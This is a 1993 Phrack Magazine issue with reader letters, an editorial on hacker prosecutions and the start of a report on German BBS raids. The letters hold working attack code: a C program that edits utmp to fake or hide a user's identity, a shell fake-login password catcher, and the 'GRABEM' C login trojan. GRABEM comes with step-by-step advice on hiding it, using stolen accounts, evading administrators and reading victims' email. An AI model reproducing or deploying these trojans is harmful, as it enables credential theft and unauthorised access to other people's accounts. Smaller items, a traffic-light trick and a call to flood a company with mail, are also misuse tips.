1115 lines
46 KiB
Plaintext
1115 lines
46 KiB
Plaintext
==Phrack Magazine==
|
|
|
|
Volume Four, Issue Forty-Two, File 2a of 14
|
|
|
|
[-=:< Phrack Loopback >:=-]
|
|
============================================================================
|
|
!!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!!
|
|
============================================================================
|
|
|
|
I 'found' this little C program a few days ago, and runs on most UNIX
|
|
machines I think (As I found it, I cant claim fame for writing it!).
|
|
|
|
What it does, is change your userid and x25 address to anything of your
|
|
choice. This only affects programs such as 'write' and 'who'. It doesn't
|
|
automatically give you different access rights, so it can only be used
|
|
to disguise your real identity.
|
|
|
|
Usage
|
|
-----
|
|
|
|
inv god somewhere (Changes your uid to 'god' and X.25 to 'somewhere')
|
|
inv '' '' (Makes you INVISIBLE on 'who')
|
|
|
|
Program invis.c
|
|
---------------
|
|
|
|
#include <stdio.h>
|
|
#include <utmp.h>
|
|
#include <sys/types.h>
|
|
|
|
#include <lastlog.h>
|
|
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
{
|
|
FILE *f;
|
|
struct utmp u;
|
|
|
|
int v=ttyslot(1);
|
|
if(v==-1)
|
|
{
|
|
fprintf(stderr,"Can't find terminal.\n");
|
|
exit(1);
|
|
|
|
if(argc!=3)
|
|
{
|
|
fprintf(stderr,"Args!\n");
|
|
exit(1);
|
|
}
|
|
f=fopen("/etc/utmp","r+");
|
|
if(f==NULL)
|
|
{
|
|
fprintf(stderr,"Utmp has escaped!\n");
|
|
exit(1);
|
|
}
|
|
if(fseek(f,v*sizeof(u),0)==-1)
|
|
{
|
|
fprintf(stderr,"Garbage utmp\n");
|
|
exit(1);
|
|
}
|
|
if(fread((char *)&u,sizeof(u),1,f)!=1)
|
|
{
|
|
fprintf(stderr,"Write failed\n");
|
|
exit(1);
|
|
}
|
|
|
|
strncpy(u.ut_name,argv[1],8);
|
|
strncpy(u.ut_host,argv[2],16);
|
|
if(fseek(f,v*sizeof(u),0)==-1)
|
|
{
|
|
fprintf(stderr,"Seek failed\n");
|
|
exit(1);
|
|
}
|
|
fwrite((char *)&u,sizeof(u),1,f);
|
|
fclose(f);
|
|
}
|
|
|
|
I personaly have not used this program (to hack or for anything else)
|
|
What you do with it is up to you....,
|
|
________
|
|
Have fun...., !!! ( )____
|
|
( Alas, life )
|
|
( is but an )
|
|
( Aardvaark.. )
|
|
( __ )
|
|
. (_____) (____)
|
|
* * * * * * * * * * * * * * * * . ? . ()
|
|
* CHEERS_ THEN - _ _ * __ ()
|
|
* ___/_/______|_|___| |__ * / \ ()
|
|
* |________ _______| |__| * |_ _|
|
|
* / / | | | | | | * |(0)||(0)|
|
|
* / /___ | | | | | | * /|_ \/ _|\
|
|
* /___ / | | | | | | * || | == | ||
|
|
* / / | | \ \__/ / * || \____/ ||
|
|
* / / |_| \____/ * ///\ !! /\\\
|
|
*-*-/_/-*-*-*-*-*-*-*-*-*-*-*-*-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-=
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
I am interested in getting in contact with hackers in Nord Italy
|
|
(I am located in Torino). Do you know anybody ?
|
|
|
|
Can you help TheNewHacker ??
|
|
|
|
Thanks
|
|
|
|
TheNewHacker
|
|
|
|
[Editor: Actually, we are in the process of recruiting people to
|
|
write for a compilation file on the hacking scenes in countries
|
|
around the world. One person is working on Italy. Perhaps when
|
|
this file is completed, you will be able to network through that
|
|
information.
|
|
If anyone in a country other than America is interested in
|
|
contributing to this effort, please write us at:
|
|
phrack@well.sf.ca.us ! ]
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
|
|
hello, i must say i love your publication. I have a little kind of
|
|
hack/phreak for you guys.
|
|
|
|
When you approach a Red light, preferably at night with few cars around,
|
|
continually flash your bright lights. This tricks the light into believing
|
|
this a cop waiting behind traffic at the light thus changing the light after
|
|
about 10 flashes. I discovered that after seeing several police officers turn
|
|
on their lights before they hit lights and was amazed on how easily the light
|
|
changed. If you have say, a Mag-lite the trick works if you point directly
|
|
at the top of the post-light and the ones hanging right above red on verticals
|
|
and right above yellow on horizontals.
|
|
|
|
hope this helps etc. (i fucking hate those damn red lights)
|
|
|
|
Dave.
|
|
|
|
[Editor: I've actually tried this. It works on most major
|
|
intersections]
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
Hallo !
|
|
I'd like to make just some addition to the APPENDIX A of the
|
|
Racketeer's article "The POWER of Electronic Mail" - there are
|
|
new guys in InterNET -> Russians (!). They have the awful
|
|
connection, but it's cool team. So, add :
|
|
|
|
.su kremvax.hq.demos.su
|
|
|
|
And one more note, in the SMTP installed on the Sun Station I'm working
|
|
on there isn't command TICK, but exist some strange like RSET and
|
|
EXPN.
|
|
Spy
|
|
|
|
P.S. Sorry for my bad English.
|
|
|
|
[Editor: Russia has a lot of computers online these days. Look for
|
|
more on the Russian Internet in upcoming Phracks!]
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
There is another, much simpler way to expand your password collection,
|
|
other than tty spoofing. Why not just run a program that simulates the
|
|
login process, and then leave it running on the console for an unsuspecting
|
|
victim? A simple example is below. Execute by typing getpass:logout.
|
|
|
|
--------File: getpass----------
|
|
LOGIN=""
|
|
PASSWD=""
|
|
clear
|
|
echo -n "login: "
|
|
read LOGIN
|
|
echo "$LOGIN" >name
|
|
sleep 3
|
|
echo -n "Password:"
|
|
read PASSWD
|
|
echo "$PASSWD" >password
|
|
echo
|
|
echo -n "Login incorrect"
|
|
-------------------------------
|
|
|
|
The only problem I have is that I don't know how to make it so that
|
|
the password, when entered, isn't shown on the screen. I'm sure you
|
|
can come up with a solution.
|
|
|
|
|
|
[Editor: actually, someone kinda did. See the next letter]
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
A Better UNIX Password Grabber
|
|
by The K-Man
|
|
|
|
|
|
I blame it entirely on boredom. Well, that and an acute case of end-
|
|
of-semester neural gridlock. I was sitting in the lab a couple of years
|
|
ago, my head leaning against a Sparc-2 display, my index finger hitting the
|
|
return key over and over again at the login prompt. It was all my mind and
|
|
body were capable of at the time. Then a little thought formed in the back
|
|
of my mind: "You know, it would be pretty damn easy to write a program to
|
|
imitate the behavior of this screen while grabbing user id's and passwords."
|
|
So I logged in and started coding. Then I thought to myself, "You know, with
|
|
a few extra lines of code and a couple of tricks, I could make this little
|
|
guy almost completely undetectable and untraceable while running." So I
|
|
coded some more. A couple of hours later, out popped the following
|
|
program:
|
|
|
|
---------------------------- Cut Here -----------------------------------
|
|
|
|
/*----------------------------------------------------------------------+
|
|
| GRABEM 1.0 by The K-Man |
|
|
| A Cute little program to collect passwords on the Sun workstations. |
|
|
+----------------------------------------------------------------------*/
|
|
|
|
#define PASSWORD "Password:"
|
|
#define INCORRECT "\nLogin incorrect"
|
|
#define FILENAME ".exrc%"
|
|
|
|
#include <stdio.h>
|
|
#include <signal.h>
|
|
|
|
|
|
/*-----------------------------------------------------------------------+
|
|
| ignoreSig |
|
|
| |
|
|
| Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT. |
|
|
+-----------------------------------------------------------------------*/
|
|
void ignoreSig ()
|
|
{
|
|
return;
|
|
}
|
|
|
|
|
|
/*-----------------------------------------------------------------------+
|
|
| Main |
|
|
+-----------------------------------------------------------------------*/
|
|
main()
|
|
{
|
|
|
|
char name[10], /* users name */
|
|
password[10]; /* users password */
|
|
|
|
|
|
|
|
int i, /* loop counter */
|
|
lab, /* lab # you're running on */
|
|
procid; /* pid of the shell we're under */
|
|
|
|
FILE *fp; /* output file */
|
|
|
|
|
|
/*-------------------------------------------------------------------+
|
|
| Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\) |
|
|
| signals so the program doesn't stop and dump back to the shell. |
|
|
+-------------------------------------------------------------------*/
|
|
signal (SIGINT, ignoreSig);
|
|
signal (SIGTSTP, ignoreSig);
|
|
signal (SIGQUIT, ignoreSig);
|
|
|
|
/*-------------------------------------------------------------------+
|
|
| Get the parent pid so that we can kill it quickly later. Remove |
|
|
| this program from the account. |
|
|
+-------------------------------------------------------------------*/
|
|
procid = getppid();
|
|
system ("\\rm proj2");
|
|
|
|
/*-------------------------------------------------------------------+
|
|
| Ask for the lab # we're running on. Clear the screen. |
|
|
+-------------------------------------------------------------------*/
|
|
printf ("lab#: ");
|
|
scanf ("%d", &lab);
|
|
for (i=1; i<40; i++)
|
|
printf ("\n");
|
|
getchar();
|
|
|
|
/*-------------------------------------------------------------------+
|
|
| Outer for loop. If the name is <= 4 characters, it's probably not |
|
|
| a real id. They screwed up. Give 'em another chance. |
|
|
+-------------------------------------------------------------------*/
|
|
for(;;)
|
|
{
|
|
/*---------------------------------------------------------------+
|
|
| If they hit return, loop back and give 'em the login again. |
|
|
+---------------------------------------------------------------*/
|
|
for (;;)
|
|
{
|
|
printf("lab%1d login: ",lab);
|
|
gets (name);
|
|
|
|
if (strcmp (name, "") != 0)
|
|
break;
|
|
}
|
|
|
|
/*---------------------------------------------------------------+
|
|
| Turn off the screen echo, ask for their password, and turn the |
|
|
| echo back on. |
|
|
+---------------------------------------------------------------*/
|
|
system ("stty -echo > /dev/console");
|
|
printf(PASSWORD);
|
|
scanf("%s",password);
|
|
getchar();
|
|
system ("stty echo > /dev/console");
|
|
|
|
|
|
/*---------------------------------------------------------------+
|
|
| Write their userid and password to the file. |
|
|
+---------------------------------------------------------------*/
|
|
if ( ( fp = fopen(FILENAME,"a") ) != NULL )
|
|
{
|
|
fprintf(fp,"login %s has password %s\n",name,password);
|
|
fclose(fp);
|
|
}
|
|
|
|
/*---------------------------------------------------------------+
|
|
| If the name is bogus, send 'em back through |
|
|
+---------------------------------------------------------------*/
|
|
if (strlen (name) >= 4)
|
|
break;
|
|
else
|
|
printf (INCORRECT);
|
|
}
|
|
|
|
/*-------------------------------------------------------------------+
|
|
| Everything went cool. Tell 'em they fucked up and mis-typed and |
|
|
| dump them out to the REAL login prompt. We do this by killing the |
|
|
| parent process (console). |
|
|
+-------------------------------------------------------------------*/
|
|
printf (INCORRECT);
|
|
kill (procid, 9);
|
|
}
|
|
|
|
---------------------------- Cut Here -----------------------------------
|
|
|
|
|
|
HOW IT WORKS
|
|
|
|
You can probably figure this out by reading the code, but I thought I'd
|
|
just add some comments on why I did what I did.
|
|
|
|
The first thing is does is install the signal handler. All it does is trap
|
|
SIGINT, SIGSTP, and SIGQUIT, so that the person trying to log into the machine
|
|
this baby is running on can't kill it with a keystroke. Next, it gets the
|
|
parent process ID. We'll use this later to kill it off quickly. Then it
|
|
proceeds to erase the executable file. Sysadmins can't find a trojan horse
|
|
program that isn't there.
|
|
|
|
>From here it goes on to imitate the login and password prompts. You'll
|
|
probably have to change the code to get it to imitate the login process on
|
|
your particular machine.
|
|
|
|
When it gets a userid and password, it appends them to an existing file in
|
|
the account. I chose the .exrc, but any dot file will work. The point being
|
|
to use a file that already exists and should be in the account. Don't leave
|
|
any extra suspicious files lying around.
|
|
|
|
After it writes the uid and password to the file, it bumps the user back
|
|
to the real login prompt by killing off the shell that was the parent process
|
|
of the program. The cut is almost instantaneous; the user would have to be
|
|
inhumanly observant to notice the transition.
|
|
|
|
|
|
HOW TO USE
|
|
|
|
Well, first you need an account to run it from. If your site has guest accounts,
|
|
you've got it made. If not, I'd suggest using a little social engineering to
|
|
get one other person's account. With that account and the program, you can grab
|
|
access to many more. I wouldn't recommend running it from an account that has
|
|
your name on it. That just makes it a little more dangerous than it needs to be.
|
|
Of course, if the sysadmin happens to catch the program running on your login,
|
|
you can always claim to know nothing. Say someone else must have gotten your
|
|
password and is using your account to escape detection. He might buy it. But
|
|
if you have the source for the program sitting somewhere in your account, and
|
|
they find it, you're fucked. So it's best to use someone else's account for
|
|
the job.
|
|
|
|
After you've gotten the account you'll be running it from, you'll need to get
|
|
the program in that account somehow. I started off by keeping a copy of the
|
|
source somewhere it my account, named with something innocuous and hidden
|
|
among bunches of source files, but I got paranoid and started hauling the source
|
|
around with me on a bar floppy. Do whatever suits your level of paranoia.
|
|
|
|
Copy the source to the account you'll be running it from and compile it.
|
|
Trash the source, and name the program something that won't stand out in a
|
|
ps list. selection_svc is a nice innocuous name, and it appears everywhere.
|
|
Do a ps on one of your machines and look for processes that hang around for
|
|
a long time. You might want to hide it as a daemon. Be creative.
|
|
|
|
Now run the program and sit back and wait. Or leave and come back later.
|
|
When you know that someone has tried to log on to your booby trapped machine,
|
|
log back into the account you borrowed to run the program in and vi or emacs (if
|
|
you're that kind of person) out the captured userid and password. Simple as
|
|
that.
|
|
|
|
Note that the two times that you stand the greatest chance of being caught
|
|
are when you first compile and run the program and when you retrieve your
|
|
captured uid and passwords. There's the remote chance that someone might see
|
|
you at work and see what you're doing, but it's not very likely. If you start
|
|
acting all paranoid you'll draw more attention to yourself than you would have
|
|
gotten in the first place. If your site has dialup lines, you might want to do
|
|
a dialin to retrieve the passwords. Or you might prefer to do it in person.
|
|
All depends on your paranoia quotient which you think is more secure, I guess.
|
|
|
|
|
|
TIPS
|
|
|
|
Be careful which dot files you use. I chose the .exrc because it was something
|
|
that wasn't used often at our site. If you chose the .cshrc or other frequently
|
|
accessed file, put a # before the uid and password you write to that file. That
|
|
way, when that dot file is sourced, it'll treat that line as a comment and not
|
|
spit out an error message that could cause suspicion.
|
|
|
|
Try to run the program at a time when you know there will be heavy machine
|
|
usage. That way you'll trap something quick. The longer your program
|
|
runs, the greater the chance it will be found.
|
|
|
|
Don't be greedy. Run on only one or two machines at a time. And if you run
|
|
on more than one machine, run out of a different account on each one. Again,
|
|
the more you put out there, the better the chance that at least one will be
|
|
found.
|
|
|
|
|
|
PARTING NOTE
|
|
|
|
The morning after I wrote this program was the first time I got to use it. I
|
|
set it running on a guest account, the went to a machine across the room to
|
|
do some legitimate work. One of my friends walks in shortly after that, and
|
|
we start shooting the shit. A minute or two later, the sysadmin walks in, sits
|
|
down, and logs in to the machine I ran the program on. I came really close to
|
|
dropping my fudge right then and there. The only thing running through my
|
|
mind was "Either I'm totally fucked, or I have root." Turned out it was choice
|
|
B. Too bad the guy changed his password once a week, and I wasn't smart enough
|
|
to fix it so that I would see the change. Oh well, I had fun for a week though.
|
|
There were quite a few interesting e-mail messages sent back and forth that week.
|
|
I think the best one was the one from our (male) department head to one of our
|
|
radical she-male hard-core no-damn-gifs feminist female professors, detailing
|
|
all the perverted sexual acts that he would like to perform with and on her. :)
|
|
|
|
Anyway, have fun with the program. Maybe I'll get a chance to come up with
|
|
some more cool UNIX programs in the future.
|
|
|
|
|
|
Later,
|
|
K-Man
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
In a recent issue of PHRACK you had some article or loopback about
|
|
getting information about people via modem. I am somewhat interested in
|
|
this and could use this information. I have a friend who is a part-time
|
|
bounty hunter and could use such information to track people down.
|
|
Could you please send me some information about who to contact to find out
|
|
this information. What I could REALLY use is an on-line up-to-date
|
|
phone/address book that I could call to find out anybody's address. Is
|
|
there such a thing? If you have any information please e-mail me, since I
|
|
am unable to get your mag on a regular basis. Thanx a mil!
|
|
|
|
Scarface
|
|
|
|
[Editor: Actually there are quite a large number of databases that keep
|
|
information on everyone. There is TRW, Equifax, TransUnion,
|
|
Information America and NAI just to name a few. Many of these
|
|
services are very expensive, but even services like CompuServe
|
|
allow users to look up people all over America using
|
|
PhoneFile which compiles data from all kinds of public
|
|
records. Nexis can allow you to look up real estate data on
|
|
just about anyone with loans on their houses. Every public
|
|
utility and department of motor vehicles provides information
|
|
on their records, and many are online.
|
|
|
|
A good book to read about this kind of thing is
|
|
|
|
Privacy For Sale
|
|
Jeffrey Rothfeder
|
|
|
|
Simon & Schuster
|
|
$22.00]
|
|
-----------------------------------------------------------------------------
|
|
THE GOLDEN ERA REBORN!
|
|
|
|
Relive the thrill of the golden era of hacking through our exclusive
|
|
collection of BBS messages. Our collection contains posts from
|
|
over 40 of the most popular hack/phreak BBSes of all time.
|
|
Experience the birth of the computer underground again from your
|
|
own computer with this collection of original posts from bulletin
|
|
boards like:
|
|
|
|
* 8BBS *
|
|
* OSUNY *
|
|
* PLOVERNET *
|
|
* THE LEGION OF DOOM *
|
|
* BLACK ICE PRIVATE *
|
|
* THE PHOENIX PROJECT *
|
|
|
|
And many more...
|
|
|
|
Messages are available in many computer formats:
|
|
IBM
|
|
Amiga
|
|
Macintosh
|
|
|
|
For more information, please contact LOD Communications
|
|
|
|
email: lodcom@mindvox.phantom.com
|
|
|
|
US Mail: LOD Communications
|
|
603 W. 13th St.
|
|
Suite 1A-278
|
|
Austin, TX 78701
|
|
|
|
Voice Mail: 512-448-5098
|
|
-----------------------------------------------------------------------------
|
|
|
|
You might like this one...
|
|
--bob
|
|
****************************************
|
|
I just saw a transcript of a press conference given by
|
|
Secret Service Agent Frericks, in Lubbock last December.
|
|
|
|
here is a brief extraction...
|
|
|
|
FRERICKS: Um hm. This is a major nation wide, world wide problem from
|
|
an industry point of view with tremendous losses in funds tremendous
|
|
losses of money. the VAX account at the University is a way to get
|
|
into numerous other research accounts or Internet which is the ...you
|
|
get onto Internet you can talk to anybody else who is on Internet
|
|
anywhere in the world which these kids were talking to Belgium, and
|
|
Israel and Australia and they can do that just by this, thus avoiding
|
|
long distance phone calls. But most of the people on Internet I mean
|
|
on the VAX are there legitimately for research purposes they can go to
|
|
Mayo and get a file if they're a med student and they also get one of
|
|
these pamphlets if they get, like the Department of Engineering gives
|
|
out an account number just for that semester, the professor would give
|
|
it out so you can use the VAX well they also get one of those
|
|
pamphlets that explains what the rules are and the instructor spends a
|
|
good bit of time the first couple of classes going over computer
|
|
etiquette, computer rules.
|
|
|
|
[Editor: Another of America's finest.]
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
|
|
I typed this because of the mention of Software Security International in
|
|
the article "More than $100,000 in Illegal Software Seized" in Rambone's
|
|
Pirates Cove in Phrack 41.
|
|
He mentioned that they were the investigators that finally brought down
|
|
APL. I am not only familiar with that, a past friend of mine was
|
|
there when the Marshalls took the board. He was there as representative of
|
|
SSI.
|
|
The best part that Rambone didn't know, was that they couldn't get into
|
|
APL to verify the existence of the software, until they got the password
|
|
breaker from Novell. So in essence, they looked like some dumb fools.
|
|
They didn't have any idea on how to approach the network.
|
|
|
|
Software Security International Can be reached at...
|
|
1-800-724-4197
|
|
|
|
2020 Pennsylvania Avenue N.W.
|
|
Suite 722
|
|
Washington, D.C. 20006-1846
|
|
|
|
That is of course if they finally have gotten off the ground. Last I Heard (2-3
|
|
months ago) they were still having trouble getting Financial Backing. They did
|
|
the APL Bust for nothing, just to prove they could do it. They are also on a
|
|
lot of other BBS's around America. So as a warning to other sysops, Cover your
|
|
Ass.
|
|
|
|
You could rack up some serious negative cash flow by sending tons of
|
|
mail to the box above, then it gets Airborne'd to Washington State.
|
|
|
|
see ya
|
|
|
|
[Editor: I think it might be a good idea to send them a few postcards
|
|
every day for the next few weeks. Just to stay in touch.]
|
|
-----------------------------------------------------------------------------
|
|
|
|
==Phrack Magazine==
|
|
|
|
Volume Four, Issue Forty-Two, File 2b of 14
|
|
|
|
[-=:< Editorial >:=-]
|
|
|
|
Before I jump upwards onto my soapbox and spew forth a meaty
|
|
editorial I would like to relay something to the readers of Phrack.
|
|
The following is a transcript of John Lee's (Corrupt's) confession
|
|
to the charges facing him. (From Security Insider Report, Jan. 1993)
|
|
|
|
What follows is in my opinion a very poor attempt at a plea-bargain,
|
|
and obviously induced by attorney coercion. I must wonder what John
|
|
was thinking when he agreed to this admission.
|
|
======================================================================
|
|
|
|
I agreed with others to violate various laws related to the use of
|
|
computers. I agreed to do the following:
|
|
|
|
1) I agreed to possess in excess of fifteen passwords which
|
|
permitted me to gain access to various computer systems
|
|
including all systems mentioned in the indictment and others.
|
|
I did not have authorization to access these systems. I knew
|
|
at the time that what I did was wrong.
|
|
|
|
2) I used these access devices and in doing so obtained the value of time
|
|
I spent within these systems as well as the value of the passwords
|
|
themselves which I acknowledge was more than $1000.
|
|
|
|
3) I intentionally gained access to what I acknowledge are Federal interest
|
|
computers and I acknowledge that work had to be done to improve the
|
|
security of these systems which was necessitated by my unauthorized
|
|
access.
|
|
|
|
4) I was able to monitor data exchange between computer systems and by
|
|
doing so intentionally obtained more passwords, identifications and
|
|
other data transmitted over Tymnet and other networks.
|
|
|
|
5) I acknowledge that I and others planned to share passwords and
|
|
transmitted information across state boundaries by modem or telephone
|
|
lines and by doing so obtained the monetary value of the use of the
|
|
systems I would otherwise have had to pay for.
|
|
|
|
Among the ways I and others agreed to carry out these acts are the following:
|
|
|
|
1. I was part of a group called MOD.
|
|
|
|
2. The members of the group exchanged information including passwords
|
|
so that we could gain access to computer systems which we were not
|
|
authorized to access.
|
|
|
|
3. I got passwords by monitoring Tymnet, calling phone company
|
|
employees and pretending to be computer technicians, and using
|
|
computer programs to steal passwords.
|
|
|
|
I participated in installing programs in computer systems that would give
|
|
the highest level of access to members of MOD who possessed the secret
|
|
password.
|
|
|
|
I participated in altering telephone computer systems to obtain
|
|
free calling services such as conference calling and free billing
|
|
among others.
|
|
|
|
Finally, I obtained credit reports, telephone numbers and addresses
|
|
as well as other information about individual people by gaining access
|
|
to information and credit reporting services. I acknowledge that on
|
|
November 5, 1991, I obtained passwords by monitoring Tymnet.
|
|
|
|
I apologize for my actions and am very sorry for the trouble I have
|
|
caused to all concerned.
|
|
|
|
John Lee
|
|
|
|
|
|
==========================================================================
|
|
|
|
|
|
This issue I would like to call attention to what I consider to be
|
|
a very pressing issue. There has always been a trend to pad the
|
|
amount of dollar damages incurred to any victim of a hacker attack.
|
|
I personally feel that the blame is never directed at the true guilty
|
|
parties.
|
|
|
|
Certainly, if someone is caught breaking into a system, then they are
|
|
surely guilty of some form of electronic trespass. I will also
|
|
concede that such a person may or may not be guilty of other crimes
|
|
based upon their actions once inside that system. What I have the
|
|
most problems dealing with is the trend to blame the hacker for any
|
|
expenditures needed to further secure the system.
|
|
|
|
With this mindset, why should any corporation bother to add any
|
|
security at all? Why not just wait until someone happens across
|
|
a few poorly secured sites, nab them, and claim damages for the
|
|
much needed improvements in security?
|
|
|
|
The worst culprits in this type of behavior has been the RBOCs. As was
|
|
seen with the supposed damages incurred for the distribution of the
|
|
"911 document" and most recently with the $370,000 damages supposedly
|
|
incurred by Southwestern Bell resulting from the alleged activities
|
|
of those in MOD.
|
|
|
|
Perhaps this figure does have some basis in reality, or perhaps it is
|
|
just an arbitrary figure dreamed up by a few accountants to be used
|
|
at year end to explain some losses in the corporate stock report.
|
|
Most often figures such as this factor in such ridiculous items as
|
|
the actual system hardware penetrated. I can hardly see the relevance
|
|
of such a charge.
|
|
|
|
Even if these charges are to be believed, why isn't the blame being
|
|
evenly distributed? Why aren't stockholders crying for the heads of
|
|
system administrators, MIS managers and CIOs? These are the people who
|
|
have not adequately done their jobs, are they not? If they had expended
|
|
a bit of time, and a small amount of capital, the tools exist to make
|
|
their systems impervious to attack. Period.
|
|
|
|
If I had an investment in a company such as Southwestern Bell, I would be
|
|
outraged that the people I was employing to perform data security
|
|
functions were not apt enough to keep a group of uneducated gangsters
|
|
out of their switching systems. Why haven't there been any emergency
|
|
meetings of shareholders? Why isn't anyone demanding any changes in policy?
|
|
Why is everyone still employed?
|
|
|
|
Not to blame Southwestern Bell too harshly, they were sorely outclassed
|
|
by MOD, and had absolutely no way to cope with them. Not only because MOD
|
|
were competent telco hackers, but because Southwestern Bell's network
|
|
service provider had given them free reign.
|
|
|
|
Southwestern Bell's packet switched network, Microlink II, was designed
|
|
and implemented for SWBT by Tymnet (then owned by McDonnell Douglas).
|
|
An interesting thing I've heard about SWBNET, and about every other subnet
|
|
arranged by Tymnet, is that the information concerning gateways, utilities,
|
|
locations of node code, etc., is purported to be located in various
|
|
places throughout Tymnet internal systems. One such system, was described
|
|
to me as a TYMSHARE system that contained data files outlaying every subnet
|
|
on Tymnet, the mnemonics (username/password pair) to each utility, gateway,
|
|
and the ONTYME II mail access keys.
|
|
|
|
If this information is correct, then shouldn't Tymnet be called in to
|
|
acknowledge their role in the attacks on Southwestern Bell?
|
|
|
|
Let's say a Realtor sold you a house, but told you that he would be keeping
|
|
copies of all your keys so that he could help you with the maintenance.
|
|
Some time later, you notice that a few of your books have been read, but
|
|
nothing else is disturbed. Later on you notice that your tv is on and your
|
|
bed is all messed up. A week later your stereo is gone. You set up a trap
|
|
and catch someone going into your house with your own key! You find that
|
|
the burglars had made copies of all the keys held by your Realtor. You
|
|
then find that the Realtor neglected to put the keys in a safe, and in fact
|
|
had left them lying around on the table in his back yard labeled with
|
|
the addresses they corresponded to.
|
|
|
|
Who would you be more upset with? The individual who copied and used the
|
|
keys, or the Realtor for not providing the access to your valuables more
|
|
vigilantly? I would personally be far more upset with the Realtor, for
|
|
if he had put the keys in a safe this event would have probably never
|
|
transpired.
|
|
|
|
I'm not saying that people who get caught for breaking into computer
|
|
systems should be let go, especially if they can be proven to be involved
|
|
in the sale of hacked information for a personal profit. What I am saying
|
|
that if hackers are to be punished so vigorously for what I view as a
|
|
predominantly victimless crime, then everyone should have to line
|
|
up and take their fair share of the blame.
|
|
|
|
I think it's high time that the real blame be placed on the corporate
|
|
entities who seemingly refuse to acknowledge their role in these
|
|
break-ins. Neglect of duties and lack of responsibility on the part
|
|
of the employees, the interconnect carriers, the data network providers,
|
|
the hardware vendors, etc. all play a key role in the problems that
|
|
exist in the world's data networks today. In fact, if it were not for
|
|
computer hackers, these problems would continue to lie dormant until either
|
|
discovered by accident in the field, or the provider decided to go ahead
|
|
and illuminate its clients to the existence of such a problem.
|
|
|
|
I wholeheartedly encourage each and every reader of Phrack to
|
|
purchase one share of stock in any corporation you know that has exhibited
|
|
such tendencies and take your place on the floor of the next shareholders
|
|
meeting and scare the hell out of the board of directors.
|
|
Phrack Magazine is calling a discount brokerage very soon.
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
==Phrack Magazine==
|
|
|
|
Volume Four, Issue Forty-Two, File 2c of 14
|
|
|
|
|
|
// // /\ // ====
|
|
// // //\\ // ====
|
|
==== // // \\/ ====
|
|
|
|
/\ // // \\ // /=== ====
|
|
//\\ // // // // \=\ ====
|
|
// \\/ \\ // // ===/ ====
|
|
|
|
******************************************************************************
|
|
|
|
BBS Busts in Germany
|
|
====================
|
|
|
|
|
|
Thursday, March 18, 1993.
|
|
|
|
This day will be remembered as a black day in German BBS history.
|
|
In fact, it was the blackest day in German BBS history since the raid
|
|
of 18 Berlin BBS in Berlin and North Germany a couple of months ago.
|
|
|
|
What has happened? A couple of Bulletin Board Systems (BBS) have
|
|
been raided by the police. All these BBS had "warez" online, illegal,
|
|
pirated, copyrighted Software - usually for PC/MSDOS and Amiga.
|
|
This time, most of these BBS were in Bavaria, South Germany.
|
|
|
|
Now let's take a closer look at the events:
|
|
|
|
One guy who got busted was MST, Sysop of Southern Comfort BBS
|
|
in Munich. In fact, his board went offline 9 days before.
|
|
But he was so unlucky still having his computer and his warez.
|
|
He was even using his modem to trade warez at the very moment
|
|
the cops rang his doorbell. Why did he go offline just so short
|
|
before he got busted? His board had been running for over 1 year.
|
|
|
|
Here is the text file MST released about going offline:
|
|
|
|
THURSDAY 03-09-93 00:15
|
|
THE SOUTHERN COMFORT BBS IS CLOSED !
|
|
I AM NOT BUSTED OR ANYTHING LIKE THIS !
|
|
I CLOSED THE BBS COS OF PERSONAL REASONS AND
|
|
PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH !
|
|
I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE
|
|
IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY
|
|
ALIVE AND WILL BE HERE AT A NEW??? OPENING !
|
|
|
|
SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME !
|
|
|
|
MST/RAZOR 1911
|
|
|
|
A couple of days later, MST was posting ads in local BBS to sell his
|
|
old equipment. But obviously he wasn't fast enough. Maybe this was
|
|
one of the reasons the cops busted him on March, 18. They were afraid
|
|
he might get rid of his illegal software, so they hurried up to catch him!
|
|
|
|
He got busted at 10am this morning. Three cops were knocking on his door,
|
|
until he opened. They had a search warrant and confiscated all his
|
|
computer equipment, disks, modems...
|
|
|
|
Chris used to have a board until four months ago, and now trades for TDT and
|
|
other groups. He was in school this morning. His parents weren't home
|
|
either. So the cops broke into his house, smashed the wooden door, and
|
|
seized all his equipment. He is asked to speak to the Police this Tuesday.
|
|
|
|
Chris used to be one of the most active traders for PC warez in Germany.
|
|
He and his friend Michelangelo supported boards like Schizophrenia and
|
|
Beverly Hills, which they co-sysop'ed. They were also known as the
|
|
'Beverly Hills Boys', a new German cracking group.
|
|
|
|
After Chris' bust, a couple of boards were affected:
|
|
Beverly Hills went offline. Also the German Headquarters of the Beverly
|
|
Hills Boys, 'Twilight Zone', went offline. Their sysops estimate at least
|
|
1-3 months offline time.
|
|
|
|
The other Munich BBS and their sysops were really scared after the bust
|
|
and took down their systems for an uncertain amount of time.
|
|
|
|
One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for
|
|
every warez collector. It had 8 modems hooked up (all US Robotics Dual
|
|
Standard 16.8) and one ISDN Line.
|
|
|
|
It had over 2 GB PC warez online, and over 7 GB offline on tapes, which
|
|
would be put online according to user' requests.
|
|
|
|
But then, March 18 arrived, and the dream was shattered.
|
|
Its sysop, Rider, who was happily calling boards the previous day,
|
|
had the most shocking experience in his life. The cops came and
|
|
took his BBS.
|
|
|
|
And more..
|
|
Ego, co-sysop of a large German BBS, got busted.
|
|
Andy/Spreadpoint (ex-sysop) got busted.
|
|
And lots of others...
|
|
|
|
Unlike the US Secret Service, which delights in seizing all
|
|
electronic equipment, like stereos, TVs, VCRs, the German cops
|
|
